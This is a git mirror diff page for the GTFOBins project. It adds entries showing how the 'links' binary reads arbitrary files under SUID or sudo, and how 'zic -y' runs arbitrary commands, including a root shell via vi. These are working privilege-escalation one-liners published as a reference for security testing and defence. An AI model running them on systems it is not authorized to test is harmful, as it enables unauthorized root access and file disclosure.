1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-13 19:16:02 +02:00

Compare commits

...

4 Commits

Author SHA1 Message Date
Tizian Seehaus c70fbaf5bf
Merge 5d721ea9af into 97f46f1526 2024-04-24 13:27:17 +08:00
Juampa Rodríguez 97f46f1526
Create links
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2024-04-10 22:46:01 +02:00
tibotix 5d721ea9af
Add Shell to zic.md 2023-07-20 17:01:04 +02:00
tibotix 9d438a06d9
Add zic command execution 2023-07-20 15:18:44 +02:00
2 changed files with 38 additions and 0 deletions

16
_gtfobins/links.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The result is displayed in a TUI interface.
functions:
file-read:
- code: |
LFILE=file_to_read
links "$LFILE"
suid:
- code: |
LFILE=file_to_read
./links "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo links "$LFILE"
---

22
_gtfobins/zic.md Normal file
View File

@ -0,0 +1,22 @@
---
functions:
command:
- description: |
This executes system(''id' 0 'arg2''), and system(''id' 1 'arg2'').
You can also pass negative numbers, so the resulting command would look like system(''id' -1 'arg2'').
- code: |
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
zic -d . -y "id" ./zicfile
sudo:
- code: |
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
zic -d . -y "id" ./zicfile
shell:
- code: |
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
zic -d . -y "vi" ./zicfile
:!/bin/bash
---